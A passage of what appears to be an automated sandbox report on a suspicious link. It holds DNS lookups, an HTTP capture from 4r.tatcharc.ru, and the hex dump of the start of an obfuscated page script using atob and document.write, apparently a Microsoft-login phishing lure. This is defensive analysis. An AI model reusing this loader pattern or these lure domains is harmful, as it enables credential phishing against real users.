                                                                                                        Dec 18, 2024 18:49:04.178417921 CET1.1.1.1192.168.2.70x5a15No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.100A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:04.178417921 CET1.1.1.1192.168.2.70x5a15No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.99A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:04.178417921 CET1.1.1.1192.168.2.70x5a15No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.98A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:04.178417921 CET1.1.1.1192.168.2.70x5a15No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.101A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:04.178417921 CET1.1.1.1192.168.2.70x5a15No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.19A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:04.234298944 CET1.1.1.1192.168.2.70x2b8eNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:04.234298944 CET1.1.1.1192.168.2.70x2b8eNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:04.234836102 CET1.1.1.1192.168.2.70x81b9No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:04.234836102 CET1.1.1.1192.168.2.70x81b9No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:04.234921932 CET1.1.1.1192.168.2.70xe0aaNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:04.241781950 CET1.1.1.1192.168.2.70xeeb9No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:04.323704958 CET1.1.1.1192.168.2.70x16c8No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:04.323704958 CET1.1.1.1192.168.2.70x16c8No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:04.323704958 CET1.1.1.1192.168.2.70x16c8No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:04.323704958 CET1.1.1.1192.168.2.70x16c8No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:06.647609949 CET1.1.1.1192.168.2.70xcf41No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:06.648155928 CET1.1.1.1192.168.2.70xbe4aNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:06.648155928 CET1.1.1.1192.168.2.70xbe4aNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:06.694272995 CET1.1.1.1192.168.2.70x695eNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:06.694272995 CET1.1.1.1192.168.2.70x695eNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:06.694272995 CET1.1.1.1192.168.2.70x695eNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:06.694272995 CET1.1.1.1192.168.2.70x695eNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:08.093651056 CET1.1.1.1192.168.2.70x86edNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:08.093651056 CET1.1.1.1192.168.2.70x86edNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:08.099564075 CET1.1.1.1192.168.2.70x81bdNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:08.099564075 CET1.1.1.1192.168.2.70x81bdNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:08.099576950 CET1.1.1.1192.168.2.70xf240No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:08.127216101 CET1.1.1.1192.168.2.70x637fNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:13.281611919 CET1.1.1.1192.168.2.70xf815No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:18.256259918 CET1.1.1.1192.168.2.70x9a5cNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:18.256259918 CET1.1.1.1192.168.2.70x9a5cNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.99A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:18.256259918 CET1.1.1.1192.168.2.70x9a5cNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.98A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:18.256259918 CET1.1.1.1192.168.2.70x9a5cNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.101A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:18.256259918 CET1.1.1.1192.168.2.70x9a5cNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.19A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:18.256259918 CET1.1.1.1192.168.2.70x9a5cNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.100A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:35.284503937 CET1.1.1.1192.168.2.70x3703No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:35.284503937 CET1.1.1.1192.168.2.70x3703No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.208.66A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:35.284503937 CET1.1.1.1192.168.2.70x3703No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.209.73A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:35.284503937 CET1.1.1.1192.168.2.70x3703No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.99A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:35.284503937 CET1.1.1.1192.168.2.70x3703No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.100A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:35.284503937 CET1.1.1.1192.168.2.70x3703No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.98A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:35.284503937 CET1.1.1.1192.168.2.70x3703No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.101A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:54.125907898 CET1.1.1.1192.168.2.70x2caaNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:54.125907898 CET1.1.1.1192.168.2.70x2caaNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:50:14.282915115 CET1.1.1.1192.168.2.70xdf6eNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:50:14.282915115 CET1.1.1.1192.168.2.70xdf6eNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:50:46.843015909 CET1.1.1.1192.168.2.70x9b9aNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:50:46.843015909 CET1.1.1.1192.168.2.70x9b9aNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.99A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:50:46.843015909 CET1.1.1.1192.168.2.70x9b9aNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.98A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:50:46.843015909 CET1.1.1.1192.168.2.70x9b9aNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.21A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:50:46.843015909 CET1.1.1.1192.168.2.70x9b9aNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.100A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:50:46.843015909 CET1.1.1.1192.168.2.70x9b9aNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.208.74A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:50:46.843015909 CET1.1.1.1192.168.2.70x9b9aNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.56.99A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:19.489595890 CET1.1.1.1192.168.2.70x85c3No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:19.490988970 CET1.1.1.1192.168.2.70x39cdNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:19.490988970 CET1.1.1.1192.168.2.70x39cdNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:21.798666954 CET1.1.1.1192.168.2.70x98b4No error (0)kvbkbauzx0vyfgwmojnfccipm61yerioyjc3gynl5wjyfxpwmubhyata.birsbunh.ru104.21.16.1A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:21.798666954 CET1.1.1.1192.168.2.70x98b4No error (0)kvbkbauzx0vyfgwmojnfccipm61yerioyjc3gynl5wjyfxpwmubhyata.birsbunh.ru104.21.32.1A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:21.798666954 CET1.1.1.1192.168.2.70x98b4No error (0)kvbkbauzx0vyfgwmojnfccipm61yerioyjc3gynl5wjyfxpwmubhyata.birsbunh.ru104.21.96.1A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:21.798666954 CET1.1.1.1192.168.2.70x98b4No error (0)kvbkbauzx0vyfgwmojnfccipm61yerioyjc3gynl5wjyfxpwmubhyata.birsbunh.ru104.21.64.1A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:21.798666954 CET1.1.1.1192.168.2.70x98b4No error (0)kvbkbauzx0vyfgwmojnfccipm61yerioyjc3gynl5wjyfxpwmubhyata.birsbunh.ru104.21.48.1A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:21.798666954 CET1.1.1.1192.168.2.70x98b4No error (0)kvbkbauzx0vyfgwmojnfccipm61yerioyjc3gynl5wjyfxpwmubhyata.birsbunh.ru104.21.80.1A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:21.798666954 CET1.1.1.1192.168.2.70x98b4No error (0)kvbkbauzx0vyfgwmojnfccipm61yerioyjc3gynl5wjyfxpwmubhyata.birsbunh.ru104.21.112.1A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:21.798748970 CET1.1.1.1192.168.2.70xe14fNo error (0)kvbkbauzx0vyfgwmojnfccipm61yerioyjc3gynl5wjyfxpwmubhyata.birsbunh.ru65IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:25.508951902 CET1.1.1.1192.168.2.70x9836No error (0)kvbkbauzx0vyfgwmojnfccipm61yerioyjc3gynl5wjyfxpwmubhyata.birsbunh.ru104.21.16.1A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:25.508951902 CET1.1.1.1192.168.2.70x9836No error (0)kvbkbauzx0vyfgwmojnfccipm61yerioyjc3gynl5wjyfxpwmubhyata.birsbunh.ru104.21.32.1A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:25.508951902 CET1.1.1.1192.168.2.70x9836No error (0)kvbkbauzx0vyfgwmojnfccipm61yerioyjc3gynl5wjyfxpwmubhyata.birsbunh.ru104.21.96.1A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:25.508951902 CET1.1.1.1192.168.2.70x9836No error (0)kvbkbauzx0vyfgwmojnfccipm61yerioyjc3gynl5wjyfxpwmubhyata.birsbunh.ru104.21.64.1A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:25.508951902 CET1.1.1.1192.168.2.70x9836No error (0)kvbkbauzx0vyfgwmojnfccipm61yerioyjc3gynl5wjyfxpwmubhyata.birsbunh.ru104.21.48.1A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:25.508951902 CET1.1.1.1192.168.2.70x9836No error (0)kvbkbauzx0vyfgwmojnfccipm61yerioyjc3gynl5wjyfxpwmubhyata.birsbunh.ru104.21.80.1A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:25.508951902 CET1.1.1.1192.168.2.70x9836No error (0)kvbkbauzx0vyfgwmojnfccipm61yerioyjc3gynl5wjyfxpwmubhyata.birsbunh.ru104.21.112.1A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:25.509275913 CET1.1.1.1192.168.2.70x34adNo error (0)kvbkbauzx0vyfgwmojnfccipm61yerioyjc3gynl5wjyfxpwmubhyata.birsbunh.ru65IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:25.561530113 CET1.1.1.1192.168.2.70x9ffaNo error (0)www.outlook.comoutlook.office365.comCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:25.561530113 CET1.1.1.1192.168.2.70x9ffaNo error (0)outlook.office365.comooc-g2.tm-4.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:25.561530113 CET1.1.1.1192.168.2.70x9ffaNo error (0)ooc-g2.tm-4.office.com52.98.61.34A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:25.561530113 CET1.1.1.1192.168.2.70x9ffaNo error (0)ooc-g2.tm-4.office.com40.99.70.210A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:25.561530113 CET1.1.1.1192.168.2.70x9ffaNo error (0)ooc-g2.tm-4.office.com40.99.60.2A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:25.561530113 CET1.1.1.1192.168.2.70x9ffaNo error (0)ooc-g2.tm-4.office.com52.98.95.210A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:25.561530113 CET1.1.1.1192.168.2.70x9ffaNo error (0)ooc-g2.tm-4.office.com40.99.70.226A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:25.561530113 CET1.1.1.1192.168.2.70x9ffaNo error (0)ooc-g2.tm-4.office.com52.98.32.2A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:25.561530113 CET1.1.1.1192.168.2.70x9ffaNo error (0)ooc-g2.tm-4.office.com40.99.70.178A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:25.561530113 CET1.1.1.1192.168.2.70x9ffaNo error (0)ooc-g2.tm-4.office.com52.98.61.50A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:25.754863024 CET1.1.1.1192.168.2.70xc300No error (0)www.outlook.comoutlook.office365.comCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:25.754863024 CET1.1.1.1192.168.2.70xc300No error (0)outlook.office365.comooc-g2.tm-4.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:26.387234926 CET1.1.1.1192.168.2.70xb4feNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:26.387234926 CET1.1.1.1192.168.2.70xb4feNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.100A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:26.387234926 CET1.1.1.1192.168.2.70xb4feNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.98A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:26.387234926 CET1.1.1.1192.168.2.70xb4feNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.101A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:26.387234926 CET1.1.1.1192.168.2.70xb4feNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.99A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:28.464842081 CET1.1.1.1192.168.2.70xb646No error (0)outlook.live.comolc-g2.tm-4.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:28.464842081 CET1.1.1.1192.168.2.70xb646No error (0)olc-g2.tm-4.office.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:28.464842081 CET1.1.1.1192.168.2.70xb646No error (0)outlook.ms-acdc.office.comMRS-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:28.464842081 CET1.1.1.1192.168.2.70xb646No error (0)MRS-efz.ms-acdc.office.com52.98.200.242A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:28.464842081 CET1.1.1.1192.168.2.70xb646No error (0)MRS-efz.ms-acdc.office.com52.98.200.226A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:28.464842081 CET1.1.1.1192.168.2.70xb646No error (0)MRS-efz.ms-acdc.office.com40.101.92.2A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:28.464842081 CET1.1.1.1192.168.2.70xb646No error (0)MRS-efz.ms-acdc.office.com52.98.163.34A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:28.544567108 CET1.1.1.1192.168.2.70x7523No error (0)outlook.live.comolc-g2.tm-4.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:35.522227049 CET1.1.1.1192.168.2.70xdaa4No error (0)ajax.aspnetcdn.commscomajax.vo.msecnd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:35.687383890 CET1.1.1.1192.168.2.70x8af5No error (0)ajax.aspnetcdn.commscomajax.vo.msecnd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:35.801814079 CET1.1.1.1192.168.2.70x78d2No error (0)assets.onestore.msassets.onestore.ms.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:36.074196100 CET1.1.1.1192.168.2.70x41e1No error (0)assets.onestore.msassets.onestore.ms.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:38.445599079 CET1.1.1.1192.168.2.70xac32No error (0)ajax.aspnetcdn.commscomajax.vo.msecnd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:38.446034908 CET1.1.1.1192.168.2.70xe328No error (0)ajax.aspnetcdn.commscomajax.vo.msecnd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:39.667130947 CET1.1.1.1192.168.2.70x6581No error (0)c.s-microsoft.comc-s.cms.ms.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:39.744946957 CET1.1.1.1192.168.2.70xb503No error (0)c.s-microsoft.comc-s.cms.ms.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:42.557638884 CET1.1.1.1192.168.2.70xd375No error (0)c.s-microsoft.comc-s.cms.ms.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:42.557657957 CET1.1.1.1192.168.2.70x7baaNo error (0)c.s-microsoft.comc-s.cms.ms.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                        • 4r.tatcharc.ru
                                                                                                        • https:
                                                                                                          • challenges.cloudflare.com
                                                                                                          • cdnjs.cloudflare.com
                                                                                                          • code.jquery.com
                                                                                                          • kvbkbauzx0vyfgwmojnfccipm61yerioyjc3gynl5wjyfxpwmubhyata.birsbunh.ru
                                                                                                          • www.outlook.com
                                                                                                          • outlook.live.com
                                                                                                        • a.nel.cloudflare.com
                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        0192.168.2.749770172.67.153.2474439008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 17:49:02 UTC662OUTGET /hdlV/ HTTP/1.1
                                                                                                        Host: 4r.tatcharc.ru
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Sec-Fetch-Site: none
                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                        Sec-Fetch-User: ?1
                                                                                                        Sec-Fetch-Dest: document
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 17:49:03 UTC1240INHTTP/1.1 200 OK
                                                                                                        Date: Wed, 18 Dec 2024 17:49:03 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Cache-Control: no-cache, private
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        vary: accept-encoding
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zmkLCOOoP1jL%2Fg6S5G1DSSsUp9WtMmS4ojRQr50cLofdS8A%2F3vuGSMCikFUXNogfkgyFbdgXnPh5NCVkCmlX20yXHfyWoRDFpZEjtwNS094J21o53d43Ok42erqtag%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1180&min_rtt=1173&rtt_var=455&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1569&delivery_rate=2304207&cwnd=252&unsent_bytes=0&cid=2db34626bb645949&ts=457&x=0"
                                                                                                        Set-Cookie: XSRF-TOKEN=eyJpdiI6InMyaWFCT1hqZEVieitranVsVGJQNWc9PSIsInZhbHVlIjoiaCtBZENueWsraWUrZ2JYa082M1I4OTUwa3pwSzA0Qnhla1kxSVpkN2Z5WHpXTDF2alUyd0QrdVJBSXMrNzMrZEdLUms2ci90V05ialpRQ05IeTJ1cFVFM0JQK3M0eE9aMU5VcGtZdU5kV0tiNUxDQnltZ0VkVUxERlM5bUhNd00iLCJtYWMiOiI1YTI5MmZkYzM4ZjE2ZDY0NTU1MjAyYzIwOGU2ZDY2NTM4NDY0ZDc0OWFhMWZhZmFmOTYyMDhiNTg3YTQ3MTU1IiwidGFnIjoiIn0%3D; expires=Wed, 18-Dec-2024 19:49:03 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                        2024-12-18 17:49:03 UTC733INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6b 56 79 65 55 68 6b 61 7a 64 46 4f 55 56 70 52 48 52 34 55 45 70 56 56 6b 35 32 56 6b 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 4e 45 64 45 5a 6d 5a 45 57 55 6c 6e 5a 32 70 4b 55 44 56 5a 63 6c 4d 78 5a 46 68 56 62 56 42 69 55 6c 64 48 4d 58 68 35 63 32 64 6a 55 47 51 33 53 69 73 32 51 7a 68 4d 62 6b 39 4b 53 55 39 68 55 48 5a 45 56 6c 6b 32 56 47 31 4d 51 6d 46 49 57 54 68 59 63 6b 4d 76 54 6d 56 75 4d 46 5a 31 4e 31 70 4d 4f 58 42 68 54 30 51 79 51 57 35 76 64 44 51 78 57 54 56 35 53 54 64 42 54 58 4a 58 59 54 42 6a 57 6e 64 68 4e 30 68 42 4e 6e 4a 48 59 31 64 46 55 31 52 32 52 7a 4a 59 52 54 42 57 4e 7a 4e 50 4e 48 52 71 4e 58 6b
                                                                                                        Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IkVyeUhkazdFOUVpRHR4UEpVVk52VkE9PSIsInZhbHVlIjoiNEdEZmZEWUlnZ2pKUDVZclMxZFhVbVBiUldHMXh5c2djUGQ3Sis2QzhMbk9KSU9hUHZEVlk2VG1MQmFIWThYckMvTmVuMFZ1N1pMOXBhT0QyQW5vdDQxWTV5STdBTXJXYTBjWndhN0hBNnJHY1dFU1R2RzJYRTBWNzNPNHRqNXk
                                                                                                        2024-12-18 17:49:03 UTC1369INData Raw: 34 64 31 31 0d 0a 3c 21 2d 2d 20 54 68 65 20 77 61 79 20 74 6f 20 67 65 74 20 73 74 61 72 74 65 64 20 69 73 20 74 6f 20 71 75 69 74 20 74 61 6c 6b 69 6e 67 20 61 6e 64 20 62 65 67 69 6e 20 64 6f 69 6e 67 2e 20 2d 2d 3e 0d 0a 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2a 20 54 68 65 20 73 65 63 72 65 74 20 6f 66 20 73 75 63 63 65 73 73 20 69 73 20 74 6f 20 64 6f 20 74 68 65 20 63 6f 6d 6d 6f 6e 20 74 68 69 6e 67 20 75 6e 63 6f 6d 6d 6f 6e 6c 79 20 77 65 6c 6c 2e 20 2a 2f 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 38 30 55 69 35 30 59 58 52 6a 61 47 46 79 59 79 35 79 64 53 39 6f 5a 47 78 57 4c 77 3d 3d 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70
                                                                                                        Data Ascii: 4d11... The way to get started is to quit talking and begin doing. --><script>/* The secret of success is to do the common thing uncommonly well. */if(atob("aHR0cHM6Ly80Ui50YXRjaGFyYy5ydS9oZGxWLw==") == "nomatch"){document.write(decodeURIComp
